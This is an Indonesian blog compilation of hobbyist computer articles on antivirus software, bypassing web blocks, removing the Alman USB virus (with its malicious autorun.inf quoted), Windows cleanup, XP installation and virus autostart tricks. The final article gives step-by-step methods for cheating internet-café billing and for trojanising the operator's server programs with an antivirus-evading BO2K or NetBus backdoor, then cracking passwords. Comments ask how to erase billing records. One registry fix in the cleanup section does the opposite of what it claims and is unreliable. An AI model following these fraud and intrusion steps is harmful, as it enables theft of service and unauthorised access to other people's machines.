toxic

the orbit exact intelegent connector

WAV Beta 1.0

hoho ... ketemu lagih bersama sayah noxy ... (tuben usernamenya sama .. biasanya beda ...)

nah, sekrang saya pengen nunjukkin .... nih bahwa WAV mucul yang baruu loh !!!

anjrit nih awalnya garing amat !!! ---> maap ya sodare2 ....

ya udah langsung deuh ....



apa yang baru :

1. Enkripsi database --> yeyy!!!

Enkripsi databse ini yaa, mirip morphost Antivirus yang meng-Enkrip database nya biar kagak bisa diintip orang, 'kan malu kalo diintipin

2. Fasilitas Karantina yang ajibb

Kalo Fasilitas karantina, ya karantina, kayak karantina biasa ajah ..

dan yang paling saya banggakan adalah :

3. pLugin Manager !!!!

Nah, ini yang paling susah .. kenapa harus pake plugin ? karena antivirus sekarang menurut saya tidak efektif, kenapa ? coba pikir judulnya gede-gede "ANTIVIRUS" tapi isinya Task Manager, Startup Manager, UAC, de el el. Menurut saya embel - embel ini GAK penting bagi sebuah antivirus, dengan nambahin embel-embel ini berarti nambahin memory yang dipakai, size file si Anitivrus sendiri 'kan ? makanya ... nah, cara saya nambahin taskmanager tersebut tanpa mengganggu core antivirusnya, saya pake plugin ...

begitu ...

dan tetep,, WAV Open Source ...

Bisa di download di https://sourceforge.net/projects/wedash/

https://www.virologi.info

Jebol blocking web

Kadang kita merasa kesal jika hak akses kita pada sebuah web diblok /di batasi hak aksesnya. Apalagi situs itu situs paporit kita ,yang biasa kita akses untuk mencari informasi, mencari kesenangan, mencari data, Duh hasrat tak tersalurkan nih agh..omong apaan sih?? Intinya disini saya bukan mengajari jelek akan tetapi disini saya mengajari bahwa apa yang kita usahakan itulah yang menjadi hak apa yang akan kita dapatkan. Next lanjut materi selanjutnya sejak munculnya software blocking website untuk membatasi user mengakses web-web tersebut ,warnet2 di negri antahberantah ini halah… mulai menggunakannya. Namun orang-orang yang berlabel underground tak pernah ambil pusing software sebagus apapun pasti punya kelemahan dan mereka pasti punya jalan sendiri2 untuk menembusnya….


Lanjut ke cara jebol blocking web:


Sebelumya kita cari tahu dulu tentang Dns adalah: DNS (Domain Name System) adalah suatu system yang berfungsi dalam mentranslasi suatu alamat host (misal: www.friendster.com) menjadi alamat IP (209.11.168.133). Secara prinsip alamat yang digunakan untuk mencari suatu tujuan/destination bukanlah menggunakan nama itu sendiri tetapi menggunakan IP address. Hal ini dijelaskan dalam prinsip berdasarkan model referensi OSI. Pada saat terjadi encapsulation segment menjadi packet maka akan terjadi penambahan header pada layer network yaitu alamat IP, yaitu alamat yang akan dituju maupun alamat sipengirim itu sendiri. Peristiwa pencarian alamat IP ini terjadi di upper layer yaitu lapisan Application, dimana DNS akan mengirim query atau permintaaan menuju DNS Server, untuk menanyakan alamat IP dari host yang akan dituju. Setelah alamat ini didapatkan, maka alamat ini akan ditambahkan oleh lapisan network terhadap semua segment yang diterima dari lapisan transport. Penggunaan DNS ini sangat penting sebab kemampuan otak manusia untuk mengingat deretan angka jauh lebih sulit daripada mengingat nama. Hampir semua layanan di network dicari dengan menggunakan nama, seperti web, mail maupun layanan lain seperti telnet, ssh sebagai pengganti penggunaan IP address dalam mengakses layanan sehingga memudahkan terjadinya komunikasi.


Nah setelah itu kita harus tau dimana letak bloking tersebut:



Nah dari gambaran diatas terlihat user akan mengakses situs x tetapi dia harus melewati DNS Server yang telah memblok alamat-alamat situs x tersebut lalu bagaimana situs x tersebut bisa diakses? Ya simple aja user tersebut akan menggunakan DNS lain untuk menuju ke alamat situs x tersebut. Lalu bagaimana jika firewallnya yang diset agar memblok alamat-alamat situs x tersebut, user tersebut ga mau kalah dong, gunakan aja Proxy lain untuk menuju situs x tersebut.masi ada cara lg yaitu gunain software ganti proxy dan mungkin masih banyak lagi cara yang lain hehehe



1. Tembak dengan alamat ip Targetnya


Kebanyakan software blocking website tersebut hanya melakukan Blocking terhadap DNS-nya aja sedang alamat IP –nya tidak di bloking. Kita dapat memanfaatkan kelemahan ini untuk menuju website tersebut (catatan: kita hanya bias membuka sebuah halaman saja untuk menuju root2 selanjutnya kita harus menuliskan lg alamat ip/root-nya)


Pertama kita cari alamat ipnya dengan ping web tujuan (gunakan cmd ), tau ping ga? Waduh ping itu perintah untuk mengirimkan sejumlah packet data dari suatu komputer yang terhbung dengan komputer lainnya dalam suatu jaringan.digunakan juga untuk mengecek konektivitas komputer tersebut benar-benar terhubung atau tidak dengan jaringan.



Next setelah tahu alamat ip-nya adalah: 209.11.168.133


Masuk ke browser dan langsung tembak alamat ip tersebut



Nah2…bisakan??



2. Gunakan Animous Proxy


Banyak penyedia web animous proxy salah satunya ninjaproxy (bukan promosi hanya contoh aja) next ketik alamat ini http://ninjaproxy.com



Lalu drag cursor ke bawah sampai menemukan..



pada bagian Enable HTTPS Secure Mode (harder to block), masukkan dns (alamat web-nya)


next klik go...akan dibawa ke:


http://www.ninjacloak.com/index.php/1110110A/5ca836daf2a543d5117e03fa43d7017d8e66423d0448306a17684



lihat halaman browser tersebut mirip sekali dengan web yang aslikan padahal sebenarnya kita memanfaatkan jasa web(Animous Proxy )untuk menggunakanproxy yang lain. Sebenarnya masih banyak web penyedia jasa Animous Proxy contohnya: http://cockyproxy.com , http://www.proxy4free.com , http://www.multiproxy.org , http://free-proxies.com , dll



3. Gunakan software ganti proxy


Selain memanfaatkan jasa web(Animous Proxy )untuk mengganti proxy kita juga dapat menggunakan software untuk mengubah /mengganti proxy. Saya tidak akan menjelaskan bagaimana menggunakan software ganti proxy tersebut, karena anda dapat dipelajari sendiri hehehe . Berikut software-softwre yang dapat anda gunakan untuk mengganti proxy:


download multiproxy di http://www2.multiproxy.org/mproxy12.zip


download a4proxy di http://www.inetprivacy.com/ftp/a4proxy.exe


download proxy switcher di http://www.proxyswitcher.com/pub/ProxySwitcherStandard.exe


dan masih banyak lagi software ganti ip (terserah anda pilih yang anda suka, loh kaya pilpres aja hehehe )



Disini saya sebagai naive user (user awam) hanya ingin berbagi ilmu aja, jadi jika anda udah tau dan merasa lebih pintar jangan sok-sok'an ,bahkan menghina ini adalah tutorial basi .OK mungkin ini tutorial basi bagi anda yang sudah level atas, tp tutorial ini menjadi berarti untuk temen-temen yang masih pemula dan ingin tahu tentang segala sesuatu yang berkaitan dengan internet. Dan jika dalam penulisan terdapat sesuatu atau kata-kata yang salah mohon di koreksi yah…



Thank's to:


Aat Sadewa ‘Mas sekali lg makasih, mas baik bgt sama aku'


Morphic ‘phic ayo berjuang terus, jangan off dunk!!!'


A.M Hirin ‘hayo2 jendral bagi2 3gp nya hehehe '


HaKz ‘Tole,aku tau kamu punya bakat terpendam, kamu hanya perlu berlatih'


DNZ ‘makasih coy, ilmu2 dan teknik2 dari kamu g akan ku lupakan'





baca tentang Rax1.1


http://codenesia.com/artikel/rax-file-archiver-11-intregated-rar.aspx


download rax1.1 untuk membuka artikel di bawah ini


http://dc142.4shared.com/download/103263164/72be5c23/RAX-11.exe?tsid=20090506-011743-7ac43323


&download artikel di:


http://www.kitaupload.com/download.php?file=808JebolBlockingWeb.rax


hjar virus alman dengan command prompt

Alman virus yang doyan makan aplikasi (.exe)ini memiliki ciri-ciri:


Nama Induk : Boot.exe ------->crc32: 70103D9A


size : 40.0 KB (40,960 bytes)


size on disk : 40.0 KB (40,960 bytes)


attribut : read-only,hidden


type : Apllication


Media penyebaran : file autorun.inf------> crc32: A024DA21


size : 1 KB


attribut : read-only,hidden


type : Setup Information




Bagimana virus itu menyebar melalui autorun? Alman memanfaatkan autorun sebagai media penyebaran dengan memanipulsi file autorun.inf pada USB flashdisk sebagai berikut:



-----------------------[scriptnya]-----------------------


[Autorun]


shell\open=´ò¿ª(&O)


shell\open\Command=boot.exe


shell\open\Default=1


shell\explore=×ÊÔ´¹ÜÀíÆ÷(&X)


shell\explore\Command=boot.exe



------------------------[end script]----------------------


Dari script diatas dapat dipelajari, Ketika autorun komputer berjalan maka induk virus dari virus alman ini akan dieksekusi atau dijalankan yang berarti virus alman akan mencemari komputer,karena autorun telah dimanipulasi oleh virus:


shell\open=´ò¿ª(&O) ---> buka ´ò¿ª(&O)


´ò¿ª(&O) = Open pada Removable Disk telah dimanipulasi oleh virus alman


Lalu:


shell\open\Command=boot.exe--->perintah untuk menjalankan induk virus alman ( boot.exe)


Perintah ini yang membuat flashdisk menjadi terinfeksi virus alman tersebut,yang selanjutnya,jika komputer dicolokin flashdisk ini dan autorun komputer jalan maka komputer tersebut menjadi terinfeksi virus alman.begitu dan seterusnya menyebar ke flashdisk2 yang di-share dengan komputer terinfeksi virus alman tersebut.


Sebenarnya kita dapat melihat kode special yang melekat pada tubuh virus maupun file yang telah di cemarinya kode tersebut adalah: J6vÙ0fc› dan 16䨸cc ‘(kata mas Hirin loh) sebenarnya kita juga dapat membuat aplikasi yang dapat mengidentifikasi apakah file aplikasi tersebut telah terinfeksi oleh virus alman.


Nah setelah beberapa penjelasan diatas sebaiknya saat membuka flashdisk kita lihat dulu apakah flashdisk tersebut telah tercemar klik kanan pada Drive flashdisk tersebut jika seperti gambar berikut berarti flashdisk tersebut telah tercemar virus alman.



Jika di dalam flashdisk terdapat penyusup seperti ini jangan di buka dulu…entar nyebar lagi hikz..mau aplikasi2mu tercemar? Mau tool hacking-mu tercemar? Mau antivir-mu kena cemar ga kan?? Next lakukan langkah berikut buka Command Prompt atau run- cmd lalu hilangkan attribut dari virus tersebut dengan mengetikkan perintah attrib –r –s –h boot.exe


- : menghilangkan attribute


r :mengubah attribute file menjadi Read Only


s : Mengubah attribute menjadi system


h : mengubah attribute menjadi hidden.



Ketikkan dir /a untuk menampilkan semua file dalam flashdisk lalu delete induk virus alman dengan menuliskan perintah del boot.exe , hapus juga file penyebarannya yaitu autorun.inf


Dah dulu ya yang sedikit ini semoga bisa membantu.

membasmi virus tanpa antivirus

Membasmi virus tanpa antivirus
langkah-langkah umum berikut dalam membasmi virus:

1. Nonaktifkan System Restore
FasilitasSystem Restore pada Windows berguna untuk mengembalikan konfigurasi sistem ke konfigurasi sebelumnya. Agar sistem yang telah pulih tidak kembali rusak, matikan fasilitas ini dengan klik kanan pada My Computer dan pilih Properties. Lalu pilih tab System Restore dan centang bagian Turn off System Restore on All Drive.

2. Matikan proses virus
Bagaimanapun caranya, matikan proses virus. Biasanya proses virus memiliki ikon berupa folder atau dokumen MS Word. Gunakan aplikasi seperti Process Explorer, Pocket Killbox, Show Kill Process, The Killer Machine, Tune Up Utility dan sebagainya.

3. Pulihkan registry
Pulihkan registry yang telah diotak-atik oleh virus. Jika tidak, maka virus dapat menginfeksi komputer Anda lagi. Gunakan Hijack This, Registry Cleaner, Tune Up Utility atau The Killer Machine. Hapus juga entry Scheduled Task yang dibuat oleh virus jika ada.

Untuk mengembalikan Registry yg telah di proteksi oleh virus adalah:
1. Dengan menggunakan Notepad, buatlah sebuah file baru. Ketikkan isi seperti di bawah ini:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] “DisableRegistryTools”=dword:00000000

2. Simpan dengan sembarang nama file, tapi dengan ekstensi reg, misalnya enable_regedit.reg.

3. Setelah itu klik 2x file tersebut untuk meng-enable registry editor
4. Hapus file-file virus

Gunakan fasilitas Search pada Windows untuk menemukan file-file virus.
Agar file yg di hidden bisa terlihat. Pada Folder Option centang “Show Hidden File and Folder”
Jika tidak bisa dibuka karena telah diproteksi oleh virus maka
1. Buka Notepad (pilih salah satu yang paling mudah buat kamu)- Start>All Programs>Accessories>Notepad
- Win key+R>ketik notepad>enter (dilakukan jika virus belum mendisable run)
2. Copy paste tulisan dibawah ini pada notepade.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
“NoFolderOptions”=dword:00000001
3. Simpan dengan sembarang nama file, tapi dengan ekstensi reg, misalnya folder.reg.
4. Jalankan file tersebut dengan cara anda, bisa double click.
Jika ada peringatan klik Yes dan OK.
5. Terakhir Log Off komputer kamu (start>log off), kemudian Log in lagi.
5. Munculkan file-file yang disembunyikan virus
Virus pada umumnya tidak begitu kejam dengan menghapus dokumen-dokumen kita. Biasanya file-file tersebut hanya disembunyikan. Gunakan perintah attrib -s -h *.* /S /D pada Command Prompt untuk memunculkannya kembali.
6. Saran terakhir untuk pencegahan.
Hati-hatilah saat melakukan transfer data baik melalui disket, USB Flash Disk, maupun dari jaringan. Tunjukkan file hidden dan ekstensi file pada Windows Explorer. Selain itu, jangan mudah tergoda oleh file-file dengan nama yang menggoyahkan iman. Agar lebih aman selalu gunakan anti virus yang bisa dipercaya. Jika suatu saat anti virus anda tidak dapat menghapus virus yg menginfeksi PC anda cobalah pakai anti virus yg lain.

INSTAL ULANG WINDOWS XP

Langkah-langkah instalasi Windows XP :
1. Siapkan CD Windows XP
2. Nyalakan komputer
3. Masuk ke dalam BIOS dengan cara menekan tombol DELETE atau F2 pada keyboard.
4. Setting booting pada BIOS di PC dengan urutan sebagai berikut :
a. First boot (booting pertama): CDROM
b. Second boot (booting kedua) : HDD0 atau IDE0 (Harddisk)
c. Third boot (booting ketiga) : terserah anda.
5. Simpan perubahan setting pada BIOS dengan menekan F10 kemudian jawab Yes lalu ENTER.
6. Masukkan CD Windows X
7. Lalu ikutilah langkah-langkah berikut

Setelah anda memasukkan CD Windows XP, maka akan tampil pesan “ Press any key to boot from CD ” Tekan ENTER untuk melakukan proses boot pada CD Windows XP.














Setelah itu akan muncul

Windows XP Professional Setup
1. To set up windows XP now, press ENTER.
2. To repair a windows XP installation using Recovery Console, press R.
3. To quit Setup without installing Windows XP, press F3.
Tekan ENTER, untuk memulai instalasi Windows XP.
Kemudian akan muncul

Microsoft XP Licensing Agreement
1. F8 = I agree
2. ESC = I do not agree
3. PAGE DOWN = Next Page
Tekan F8, untuk setuju mengenai persetujuan lisensi Windows XP
Kemudian akan muncul

Windows XP Professional Setup
Gunakan tombol panah bawah dan atas untuk memilih item pada menu.
• To setup windows XP on the selected item, press ENTER.
• To create a partition in the unpartitioned space, press C.
• To delete the selected partition, press D.
Kemudian tekan Enter untuk melakukan Setup………..
Pilih format partisi Harddisk dengan Format the partition using the NTFS file system kemudian tekan ENTER.

Proses selanjutnya tekan ENTER lagi untuk memformat partisi Harddisk yang kita buat tadi
Pada layar akan tampil pesan Please wait while Setup formats the partition
Proses selanjutnya adalah Pengopian data/file dari CD Windows pada CD-ROM kedalam Harddisk
Setelah proses Pembagian Partisi dan Format berhasil maka komputer akan merestart sendiri PC secara otomatis atau dengan menekan tombol ENTER

Setelah komputer direstart maka akan tampil logo Windows XP seperti dibawah ini (Microsoft Windows XP Professional)


Setelah proses loading selesai, maka proses selanjutnya adalah instalasi windows (Installing Windows)
















Pada saat proses instalasi windows akan tampil jendela Regional and Languange Options, klik Next untuk proses berikutnya.

Pada jendela Personalize Your Software terdapat 2 item yaitu Name & Organization, isikan dengan informasi yang anda inginkan. Setelah anda isikan klik Next. (sebagai contoh pada Name : DEDE & Organization : BONTANG)

Proses selanjutnya adalah memasukkan Your Product Key (Serial Number yang valid atau yang serlisensi/terdaftar di Microsoft). Panjang karakter serial number untuk setiap Windows adalah 25 karakter. Setelah anda memasukkan serial number dengan benar pada Product Key klik Next

Proses selanjutnya adalah Computer Name and Administrator Password. Pada Computer Name isikan dengan nama yang anda inginkan sebagai contoh BONTANG. (ini merupakan informasi untuk nama komputer anda). Pada Type an Administrator password. (anda dapat mengisikan password atau tidak sama sekali) Klik Next untuk proses selanjutnya

Proses selanjutnya Date and Time Settings. Klik Next untuk proses selanjutnya

Proses selanjutnya Networking Settings. Pilih Typical Settings kemudian klik Next

Proses selanjutnya adalah Workgroup or Computer Domain. Pilih No kemudian klik Next

Setelah proses Instalasi selesai maka komputer akan merestart sendiri PC secara otomatis

Setelah proses boot selesai maka anda akan melihat sebuah jendela Display Setting, klik OK dan pada Monitor Settings klik OK lagi























Setelah proses penyesuaian setting tampilan antara Windows dengan Hardware VGA telah selesai anda akan melihat tampilan seperti dibawah ini

















Klik Next kemudian ada tampilan lagi klik Skip kemudian akan tampil

Ready to register with Microsoft ?
Are you ready to register online with Mircosoft ?
• Yes
• No
Pada option ini pilih No lalu klik Next untuk proses selanjutnya

Proses selanjutnya adalah membuat user account dalam WindowsPada Your Name isikan nama user yang anda inginkan. Sebaiknya 1 user name saja…….. Kemudian klik Next

Thank you!
Selamat anda telah selesai melakukan instalasi Windows XP Klik Finish untuk mengakhirinya

Selamat mencoba^.^

Virus Manfaatkan Autostart Windows

Virus Manfaatkan Autostart Windows


Bagi yang udah master jangan baca artikel ini kalau hanya akan merasa membuang2 waktu saja. Artikel ini di buat untuk membuka pengetahuan kita tentang autostart virus, bagaimana virus tersebut bisa memulai aktivitasnya aktivitas mempertahankan diri dari ancaman Av, aktivitas penyebaran (beranak-pinak), dan aktivitas-aktivitas lainnya (terserah VM-nya). Nah bagaimana virus tersebut bisa aktif (mengaktifkan diri) setiap kamu mulai menyalakan computer kamu? Jawabannya adalah virus tersebut memanfaatkan metode autostart pada windows. Lalu metode-metode autostart window itu apa aja?


1. Memanipulasi Registry


HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsCurrent\Version dengan key :


• Run


• RunOne


• RunOnceEx


• RunService


• RunServiceOnce


Manipulasi registry Juga dilakukan pada HKEY_CURRENT_USER-nya.


2. Menduplikasi (membuat peranakan virus) atau membuat shortcut pada directori C:\Documents and Settings\xxx\Start Menu\Programs\Startup



3. Memanipulasi win.ini



System Editor atau disingkat Sysedit adalah file bawaan windows yang dijalankan ketika computer masuk ke windows perama kali, seperti halnya regedit. Jadi manipulasi terhadap file win.ini pada sysedit tersebut dapat digunakan sebagai start-up bagi virus (baca:start-up tersembunyi). Loh kok tersembunyi? Karena biasanya user tidak sadar jika file win.ini tersebut telah dimanipulasi oleh virus. Manipuasi win.ini dilakukan dengan Menggunakan perintah LOAD= atau RUN= dan menambahkan pada baris:


[Windows]


load=C:\lokasiVIRUS\namaVIRUS.exe


run= C:\lokasivIRUS\namaVIRUS.exe


NAH seperti ini contoh file win.ini yang udah dimanipulasi oleh virus W32/VBWorm.MLG



Karena file win.ini juga merupakan file yang dieksekusi pertama oleh windows,file ini berisi aplikasi 16 bit yang di-support oleh windows.




4. Memanipulasi autoexec.bat


secara win namaVirus, dimana namaVirus adalah Virus yang diaktifkan. Virus tersebut akan dijalankan dari mode Dos.


Manipuasi autoexec.bat dilakukan dengan Menggunakan perintah Call dan menambahkan pada baris


Call virus.exe


Misal virus peranakan virus terdapat di C:\ maka tulis


Cd\


Call virus.exe



Sama seperti saat kamu memanggil aplikasi menggunakan Command Prompt masuk dahulu ke folder yang dituju lalu ketik nama plikasi tersebut,maka aplikasi tersebut akan dijalankan.


5. Memanipulasi system.ini


Manipuasi system.ini dilakukan dengan Menggunakan perintah Shell= dan menambahkan pada baris


[boot]


shell =explorer.exe C:\ lokasiVIRUS\namaVIRUS.exe


NAH seperti ini contoh file system.ini yang udah dimanipulasi oleh virus W32/VBWorm.MLG



Nah2..udah tau kan autostart dari komputermu sendiri? Sekarang seting-seting aja apa yang akan dijalankan pertama saat komputermu dinyalakan (diStart-up) J Cara setingnya dah tahukan? Gunakan System Configuration Utility,caranya ketik msconfig pada kotak dialog Run-OK. Untuk mendisable program, pilih tab General, klik Selective Startup lalu hilangkan tanda ceklist pada Process WIN.INI dan Load Startup Items. Atau, untuk mendisable item tertentu, pilih tab Startup atau WIN.INI, lalu hilangkan tanda ceklist pada item yang ingin kamu disable. Kamu juga bisa mengklik Disable All pada tab Startup dan WIN.INI untuk men-disable semua item pada masing-masing tab. Kamu juga bisa memaksimalkan kerja computer kamu dengan menseting services yang akan dijalankan,hilangkan ceklist pada service yang tidak dibutuhkan-tekan OK lalu restart untuk melihat perubahannya.



Semoga apa yang saya tuliskan dapat membuka pengetahuan anda…

bobol billing warnet

Pertidaktanggungjawaban : Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem komputer terutama para operator / SysAdmin dari server warnet, penulis tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun bentuknya.tulisan ini dibuat bukan untuk mecuri rejeki orang,tetapi hanya untuk memperluas wawasan para netter indonesia

Cara pertama

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?

Ini dia caranya …
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket.
Aku nemunya pas smp tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda.

NB : Program ini tidak dapat digunakan untuk warnet2 yang menggunakan GEtBack..

Cara kedua

1.pasang muka culun (ato bego) kek yg diomongkan diatas
2.sediah kopi
3.tentunya rokok
4.nah sekarang yg perlu kalian jalankan adalah
5.cabut kabel lan cardnya …
6.trus restart komputer kamu
7.jika sudah kluar gambar desktop sebelum gambar billing itu kluar kamu cepet²an tekan alt+del+ctrl dan kamu del yg client 008
gampangkan ?

Cara ketiga

Sering kali kita menjadi lupa waktu bila berada didepan komputeruntuk surfing dan hal ini ngak jadi masalah bila memakai komputer di kantor dengan koneksi broadband atau Dsl. Masalah baru muncul apabila kita surfing di Warnet. Proteksi yang biasa digunakan oleh warnet pada umumnya adalah nag screen atau window yang mengharuskan kita login terlebih dahulu [note:login ini berbeda dengan login start up] karena pada dasarnya komputer sudah dalam keadaan siap pakai hanya terhalang oleh nag screen tersebut, sedangkan koneksi ke internet dalam keadaan stand by. Yang harus dilakukan adalah membypass proteksi tersebut.

Prosedurnya adalah :
Tetap harus login terlebih dahulu agar tidak mencurigakan

Download Wincontrol –>> winctrl.exe untuk bypass login screen

Ekstrak wincontrol dan aktifkan
F9 = untuk menghilangkan window pada aktif cursor
F10= untuk mengembalikan window seperti semula
Jalankan timer untuk mengingatkan durasi waktu yang diinginkan
Logout bila telah mencapai biaya yang ditetapkan, biasanya tarif perjam Rp 6.000,-
Setelah logout tekan F9 maka login screen akan menghilang dan kita bisa kembali surfing tanpa biaya. Jangan lupa untuk menonaktifkan wincontrol setelah selesai.

Usahakan agar tidak terlalu menarik perhatian penjaga warnet [ surfing selama 3 jam = Rp 1500 ? ] cari warnet yang mempunyai banyak workstations-nya.

Untuk Mendownload Wincontrol dapat di download di www.yogyafree.net

Cara keempat

Alat yang dibutuhkan : - Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !

Praktek : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.(Setidaknya server harus ber-os MicroShit Windows 98/NT).

- Siapkan program backdoor kamu yang sudah kkamu konfigurasi bo,netbus.. terserah kamu ;p >, agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.

- Cari program .exe yang biasanya sering dippakai oleh operator warnet,i.e: Mirc32.exe, iexplore.exe dll.

- Copy file tersebut di komputer client warnnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k, (http://www.bo2k.com )

- Delete file original di komputer server (HHati - hati jika tdk bisa kemungkinan
program sedang dipakai, pake program lain spt iexplore.exe ).

- Setelah mendelete file asli di komputer seerver, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.

- Logout dari client warnet dan bayar sewa iinternet. (Pasang muka lugu dan bego).

- Setelah sehari dirasa cukup maka kembali llagi ke warnet yang di-hack dan lakukan scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ….. SELAMAT BUNG !! Anda layak tertawa….. hi….hi…hi….., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.

- Lakukan penjelajahan sepuas kamu….., lisst password jika server warnet NT dan crack pakelophtcrack, jika server windows 9x…..tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP. tanpa “ENCRYPT” sama sekali..

- Having fun….. and stay out of troble ..ddan ingat “Junjunglah Etika HACKER”, jangan sekali -kali membuat kerusakan, cukup untuk kamu lihat - lihat server warnet…OK

Created by :
Renk_x’s Avatar(kaskus.us)
Andisuseno ( andisuseno@yahoo.com )
PakTani
Tags: membobol warnet
Next: Nonton TV kabel+Siaran TV luar negeri Gratis
reply
share

13 CommentsChronological Reverse Threaded
reply
4biez wrote on Jul 10, ‘07
bisa di cuba nih mas, cuman gimana nich klo kna DePrEZ alias dalam dingin, soalnya waktu log-out billing, otomatis restart………gimana klo programnya diautorunkan lewat flashdisk….
(tapi blum bisa nge-autorun-khan program pada flashdisk nich….gimana yach…?)

reply
grandong750 wrote on Jul 18, ‘07
kklo yang itu q blom nemuin caranya !!!!!

sabar aja ya

reply
aapdotpagedottl wrote on Sep 4, ‘07, edited on Sep 4, ‘07
biar bagaimana pun anda telah membuka pintu maksiat…bns.win32
tidak semua orang bisa menjalankan saran anda…!!!

reply
grandong750 wrote on Sep 20, ‘07
aapdotpagedottl

coba

check udienz.wordpress.com
biar tau…gmn perkembangan metode2 membobol warnet………

reply
tiflatun wrote on Dec 8, ‘07
trus gmn cara hapus report database billing explorer

reply
djamoe wrote on Dec 26, ‘07
alow……aq mo nanya neeh…….!!!!!!!cara yang ke dua, apa gx ketauan op,kykny mudah bgtz????

Comment deleted at the request of the author.
reply
bungerho wrote on May 8
mo tny bos, ni mgkn da hub dkt tp jg dkt mlenceng. gmn cara dpt billing warnet gratisan wit crack?

reply
gentuh wrote on Jun 13
hallo…aku gentuh nie..cara kedua kayak nya mudah banget, tapi apa ngak ketahuan tu…ama op nya…..

reply
66633 wrote on Sep 10
trud gmna cranya biar billing g bisa di bo2l ma org..
khan thu sndri…
operator tu g diam…
ya buat waspada ja….!!!!!!!

reply
potche wrote on Sep 19
euheuehue…apa cara ini ga terlalu rumid ^_^
dL si iyy gw coba yg ini.,..
tp ini agak sulid bagi orang yg belum ngrti apa itu program SHIDE..

ada yg lebih gampang lg loh ^_^

reply
apochalipto wrote on Oct 21
tlong negh !!!
gw perlu bantuannnn..
ada yg tau gk cara menghilangkan REPORT BILLING di OPERATOR ???

reply
oebank07 wrote on Oct 24
Cara Kelima :
Kalo siang belilah minuman dingin apapun mereknya, kalo malam belilah kopi hangat & tawari operatornya. Pura2 akrablah…. ladeni ngomongannya…. nanti juga kalo sdh akrab kamu dikasih gratis ngenatnya.

Cara Keenam : (extreme)
